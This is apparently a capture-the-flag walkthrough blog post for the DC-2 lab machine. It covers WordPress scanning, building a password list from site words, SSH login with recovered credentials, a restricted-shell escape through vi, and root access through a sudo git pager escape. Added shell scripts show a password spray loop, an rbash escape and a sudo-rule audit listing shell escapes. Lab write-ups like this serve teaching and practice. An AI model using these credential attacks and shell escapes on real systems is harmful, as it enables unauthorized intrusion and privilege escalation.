DC-2

1 Information gathering

Ports 80 (web, WordPress) and 7744 (SSH) are open; the OS is Linux.

{"ip":"192.168.1.109","port":7744,"service":"ssh","Banner":"SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7\\x0d\\x0a","url":""}
{"ip":"192.168.1.109","port":80,"service":"http","Banner":"","url":"http://192.168.1.109:80"}
{"url":"http://192.168.1.109:80","StatusCode":200,"Title":"DC-2–JustanotherWordPresssite","HeaderDigest":"server:Apache/2.4.10 (Debian)","Length":53562,"KeywordFinger":"WordPress","HashFinger":""}

Ran nuclei against the WordPress site: it reports an XSS (no use here) and an SSRF (possibly useful),

plus an information disclosure that exposes two users: admin and jerry (display name Jerry Mouse).

2 Trying the web side

Browsing the WordPress site, flag1 is shown directly. It says the next flag requires logging in, and that your own wordlist probably won't be enough, so cewl is needed.

Looked at the SSRF: it uses the XML-RPC interface to make the request, but it couldn't be exploited. The WordPress version is 4.7.10, so it seems this has already been fixed?

Scanned with wpscan:

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |
 | [!] 40 vulnerabilities identified:
 |
......

It reports quite a few vulnerabilities, since the version is old (a four-year-old release, so the attacker has an easy time). One of them is unauthenticated viewing of private posts; after reading a few write-ups on it, flag2 was obtained from http://dc-2/?static=1.

flag2 says that if you can't get in through WordPress, look for another entry point, meaning SSH.

As mentioned earlier, cewl is needed to generate the wordlist. Its principle: pull the words out of the site's pages and post-process them (by default it keeps words of at least three letters).

Trying one account, jerry: adipiscing, it won't log in over SSH. Maybe the password is wrong?

Trying another, tom: parturient, it works.
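The post only describes cewl's principle in one sentence, so here is an added example of that principle (my own code, not the post's and not cewl's): strip the HTML, split on anything that is not a letter, keep words of a minimum length, dedupe, then spray the list against the known user names. The HTML is a constructed stand-in for the fetched page, and fake_ssh_login is a constructed stand-in for the SSH service on 7744 that accepts the two passwords recovered above; against the real box the list would go to hydra or similar.

```shell
#!/bin/sh
# Added example (not from the original post, not cewl's code): a minimal
# cewl-style word harvester plus a user/password spray loop, runnable offline.

# Constructed stand-in for the downloaded WordPress page (cewl would fetch it).
SAMPLE_HTML='<html><body><h1>Flag 1</h1>
<p>Your usual wordlists probably will not work, so instead maybe you just need to be cewl.</p>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Orci varius natoque
penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>
</body></html>'

# cewl-style harvesting, HTML on stdin: drop tags, split on anything that is
# not a letter, keep words of at least $1 letters (cewl's default is 3), dedupe.
harvest_words() {
    min_len=${1:-3}
    sed 's/<[^>]*>/ /g' \
      | tr -cs 'A-Za-z' '\n' \
      | awk -v n="$min_len" 'length($0) >= n' \
      | sort -u
}

# Constructed stand-in for sshd on 7744: succeeds only for the two credentials
# the walkthrough found. Against the real box this would be hydra/medusa.
fake_ssh_login() {
    case "$1:$2" in
        tom:parturient|jerry:adipiscing) return 0 ;;
        *) return 1 ;;
    esac
}

# Try every word against every user via the login function named in $3;
# print "user:password" for each hit.
spray() {
    users=$1; wordlist=$2; login_fn=$3
    for u in $users; do
        for w in $wordlist; do
            if "$login_fn" "$u" "$w"; then printf '%s:%s\n' "$u" "$w"; fi
        done
    done
}

WORDS=$(printf '%s\n' "$SAMPLE_HTML" | harvest_words 5)
spray "admin jerry tom" "$WORDS" fake_ssh_login
```

The minimum length of 5 is what makes the list small enough to spray by hand; with cewl's default of 3 the same page also yields "sit", "et", and other noise that only costs time against a real login service.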

3 Bypassing rbash

rbash, the restricted shell, is meant as a security feature, yet Wikipedia itself lists bypasses (start a program that has a shell-escape feature): use vi, or use bash.

Only the following commands are available, so vi is the only option:

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi

tom@DC-2:~$ vi
:set shell=/bin/sh
:shell

# No longer restricted, but PATH is still unchanged
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin

# Get flag3
tom@DC-2:~$ /bin/cat flag*
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
# This roughly seems to say: have a look at jerry (via su)?
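The two bypasses named above can be checked without a DC-2 box. This is an added example (mine, not the post's): it runs a few commands under bash -r, which is what rbash is, to show exactly what gets refused, then escapes the same way vi's :shell does, by spawning a child shell, which starts unrestricted and can reset the PATH it inherited. The child here is bash itself, which works whenever bash is reachable from the restricted PATH; on DC-2 it is not, which is why vi is the route there. Nothing below is DC-2-specific apart from the PATH comment.

```shell
#!/bin/sh
# Added example (not from the original post): show what rbash refuses and how
# a child shell escapes it. rbash is just bash -r, so it needs bash on PATH.

# Run one command line under a restricted bash; print "blocked" or "allowed".
rbash_probe() {
    if bash -r -c "$1" >/dev/null 2>&1; then echo allowed; else echo blocked; fi
}

# The escape. Restrictions apply only to the shell they were set in, so any
# program that can spawn a child shell (vi's :shell, or bash itself when it is
# reachable from the restricted PATH) yields an unrestricted one. The child
# inherits the crippled PATH, exactly as seen on DC-2, and can simply reset it.
rbash_escape() {
    bash -r -c 'bash -c "PATH=/bin:/usr/bin:\$PATH; cd / && pwd"'
}

main() {
    # cd, command names containing '/', and assigning PATH are all refused;
    # plain commands found on PATH still run.
    for cmd in 'cd /' '/bin/ls' 'PATH=/bin' 'ls'; do
        printf '%-12s %s\n' "$cmd" "$(rbash_probe "$cmd")"
    done
    printf 'escaped shell cwd: %s\n' "$(rbash_escape)"
}
main
```

The same applies to the vi route on DC-2: `:set shell=/bin/sh` followed by `:shell` just makes vi the program that spawns the child, and the `export PATH=...` done afterwards is the PATH reset shown inside the child command here.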

4 Privilege escalation

Working this way is tedious; it turns out the environment variables can now be changed:

tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH  # add the bin directories
tom@DC-2:~$ export SHELL=/bin/bash  # point SHELL at bash (it holds a single path, not a colon-separated list)

Ran LinEnum; no exploitable findings. Then recalled flag3: jerry's account couldn't log in over SSH earlier, so try switching to it with su instead. (This looked odd at first, but the password turns out to be valid; SSH was simply not accepting jerry's login, while su does.)

tom@DC-2:~$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!! # git is mentioned here, but I couldn't make sense of it; checked a write-up

Check whether the current user can run anything under sudo; git is among the entries:

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

There's an article on sudo privilege escalation; use its method:

sudo git help config
## at the pager prompt (less) type !/bin/sh and press Enter to get a root shell
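Reading sudo -l by eye works for one entry; as an added example (mine, not from the post), here is a small audit that pulls the rules out of sudo -l output and matches each binary against a hand-picked list of known shell escapes (the git pager trick used above plus a few others; GTFOBins has the full catalogue). The first sample is the DC-2 output from above; the second is a constructed one, not from DC-2, to exercise a rule that still needs a password and a binary with no known escape.

```shell
#!/bin/sh
# Added example (not from the original post): audit `sudo -l` output for
# NOPASSWD rules whose binary is known to hand out a shell.

# The DC-2 output from above, embedded so this runs offline.
SUDO_L_DC2='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git'

# Constructed sample (not from DC-2): one password-required rule and one
# binary that has no escape in the list below.
SUDO_L_CONSTRUCTED='User alice may run the following commands on box:
    (root) /usr/bin/find
    (ALL : ALL) NOPASSWD: /usr/bin/apt'

# Hand-picked escapes (GTFOBins lists many more). Returns 1 if unknown.
escape_hint() {
    case "$(basename "$1")" in
        git)           printf '%s\n' 'sudo git help config, then !/bin/sh at the pager prompt' ;;
        less|more|man) printf '%s\n' '!/bin/sh at the pager prompt' ;;
        vi|vim)        printf '%s\n' ':set shell=/bin/sh then :shell' ;;
        find)          printf '%s\n' 'sudo find . -exec /bin/sh \; -quit' ;;
        *)             return 1 ;;
    esac
}

# Reads sudo -l output on stdin; prints one line per rule as
# runas|nopasswd-or-password|binary|hint-or-dash (first binary of each rule).
audit_sudo_rules() {
    sed -n 's/^[[:space:]]*(\([^)]*\))[[:space:]]*\(.*\)$/\1|\2/p' \
      | while IFS='|' read -r runas rest; do
            case "$rest" in
                NOPASSWD:*) auth=nopasswd; rest=${rest#NOPASSWD:}; rest=${rest# } ;;
                *)          auth=password ;;
            esac
            bin=${rest%% *}; bin=${bin%,}
            hint=$(escape_hint "$bin") || hint=-
            printf '%s|%s|%s|%s\n' "$runas" "$auth" "$bin" "$hint"
        done
}

# Only the rules usable immediately: no password prompt and a known escape.
nopasswd_escapes() {
    audit_sudo_rules | grep '|nopasswd|' | grep -v '|-$'
}

printf '%s\n' "$SUDO_L_DC2" | nopasswd_escapes
```

Note the secure_path line in the DC-2 output: sudo resets PATH to that value, so the escape has to come from the binary itself (here git's pager), not from anything placed on tom's or jerry's PATH.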

That gives the last flag:

root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
Posted 2022-04-04 20:34 by R3col